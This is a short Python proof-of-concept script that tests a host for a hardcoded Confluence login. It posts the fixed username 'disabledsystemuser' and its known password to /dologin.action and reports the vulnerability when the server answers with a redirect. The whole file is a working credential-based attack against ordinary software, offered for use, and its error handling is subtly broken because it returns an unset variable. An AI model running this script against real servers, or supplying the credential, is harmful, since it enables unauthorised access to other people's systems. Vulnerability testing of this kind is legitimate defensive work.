import time

import requests
def sendPayload(uri):
    url="http://"+uri+"/dologin.action"
    headers={
                'Connection': 'close',
                'Cache-Control': 'max-age=0',
                'Upgrade-Insecure-Requests': '1',
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
                'Accept-Encoding': 'gzip, deflate',
                'Accept-Language': 'zh-CN,zh;q=0.8',
                'Content-Type':'application/x-www-form-urlencoded'
    }
    data="os_username=disabledsystemuser&os_password=disabled1system1user6708&login=%E7%99%BB%E5%BD%95&os_destination=%2Findex.action"
    try:
        res = requests.post(url=url,headers=headers,allow_redirects=False,data=data,timeout=20)
        print(url)
        return res
    except requests.exceptions.ConnectionError:
        print('ConnectionError -- please wait 3 seconds')
        time.sleep(3)
    except requests.exceptions.ChunkedEncodingError:
        print('ChunkedEncodingError -- please wait 3 seconds')
        time.sleep(3)
    except:
        print('Unfortunitely -- An Unknow Error Happened, Please wait 3 seconds')
        time.sleep(3)
    return res
def checkResult(res):
    result="/"
    if res.status_code == 302:
        if result in res.headers['location']:
            print('存在此漏洞')

if __name__ == '__main__':
              res = sendPayload("localhost:8090")
              checkResult(res)